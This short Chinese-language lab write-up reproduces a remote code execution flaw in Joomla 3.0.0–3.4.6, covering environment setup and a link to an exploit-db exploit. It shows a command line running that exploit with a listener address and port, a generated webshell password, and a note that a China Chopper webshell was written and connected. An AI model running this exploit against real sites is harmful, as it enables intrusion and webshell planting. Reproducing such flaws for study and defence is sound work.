Joomla漏洞复现

漏洞环境及利用

• Joomla 3.4.6 : https://downloads.joomla.org/it/cms/joomla3/3-4-6
• PHP 版本: 5.5.38
• Joomla 3.4 之前(包含3.4)不支持 PHP7.0
• 影响版本: 3.0.0 --- 3.4.6
• 漏洞利用: https://www.exploit-db.com/exploits/47465
  

 

 

下载： https://downloads.joomla.org/it/cms/joomla3/3-4-6

浏览器访问 http://127.0.0.1/Joomla/installation/index.php 安装

第3步最终确认哪里，应该选择 "不安装示范数据"

 

 

 

 

 

 

 

接下来删除installation 目录

 

 

 

漏洞利用工具:https://www.exploit-db.com/exploits/47465

 

python3 Joomla-3-4-6.py -t http://100.83.1.125/Joomla/ --exploit -l 127.0.0.1 -p 1234

 

 

 

 

得到密码为: nzzkcovkbkpisnmuvviiiodcmiowgghghrlnomierljnikxtwy

 

 

 

 发现成功写进,成功连上菜刀